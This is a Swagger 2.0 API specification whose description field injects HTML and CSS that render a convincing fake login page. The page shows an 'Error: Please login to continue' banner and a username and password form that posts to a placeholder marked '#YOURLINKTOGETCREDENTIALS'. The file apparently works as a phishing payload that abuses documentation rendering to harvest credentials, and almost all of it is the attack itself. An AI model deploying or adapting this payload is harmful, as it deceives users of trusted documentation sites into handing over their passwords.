swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: |
    <style>
      body {
        background: linear-gradient(to right, #0f2027, #203a43, #2c5364);
        font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        margin: 0;
        padding: 0;
      }
      .login-wrapper {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 90vh;
      }
      .login-card {
        background-color: #ffffff;
        border-radius: 12px;
        padding: 30px;
        width: 100%;
        max-width: 380px;
        box-shadow: 0 8px 20px rgba(0, 0, 0, 0.3);
        animation: fadeIn 0.6s ease-in-out;
      }
      @keyframes fadeIn {
        from { opacity: 0; transform: translateY(-10px); }
        to { opacity: 1; transform: translateY(0); }
      }
      h1 {
        text-align: center;
        color: #333;
        margin-bottom: 24px;
        font-size: 26px;
      }
      .form-group {
        margin-bottom: 20px;
      }
      label {
        font-size: 14px;
        color: #444;
        display: block;
        margin-bottom: 6px;
      }
      input[type="text"], input[type="password"] {
        width: 100%;
        padding: 12px;
        font-size: 14px;
        border: 1px solid #ccc;
        border-radius: 6px;
        transition: border 0.3s ease;
      }
      input:focus {
        border-color: #007BFF;
        outline: none;
      }
      .btn {
        width: 100%;
        padding: 14px;
        background: linear-gradient(135deg, #1e90ff, #00bfff);
        border: none;
        color: #fff;
        font-size: 16px;
        border-radius: 6px;
        cursor: pointer;
        transition: background 0.3s ease;
      }
      .btn:hover {
        background: linear-gradient(135deg, #007BFF, #1e90ff);
      }
      .error-message {
        background: #f8d7da;
        color: #721c24;
        border: 1px solid #f5c6cb;
        border-radius: 6px;
        padding: 12px;
        margin-bottom: 20px;
        text-align: center;
        font-size: 14px;
      }
      .footer {
        position: fixed;
        bottom: 10px;
        right: 10px;
        font-size: 12px;
        color: #ccc;
      }
    </style>

    <div class="login-wrapper">
      <div class="login-card">
        <div class="error-message">
          <strong> Error:</strong> Please login to continue.
        </div>
        <h1>Welcome Back</h1>
        <form action="#YOURLINKTOGETCREDENTIALS" method="post" class="form-signin">
          <div class="form-group">
            <label for="username">Username</label>
            <input type="text" name="username" placeholder="Enter your username">
          </div>
          <div class="form-group">
            <label for="password">Password</label>
            <input type="password" name="password" placeholder="Enter your password">
          </div>
          <div class="form-group">
            <button type="submit" class="btn"> Login</button>
          </div>
        </form>
      </div>
    </div>
    <div class="footer">Made by 0x2458</div>
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
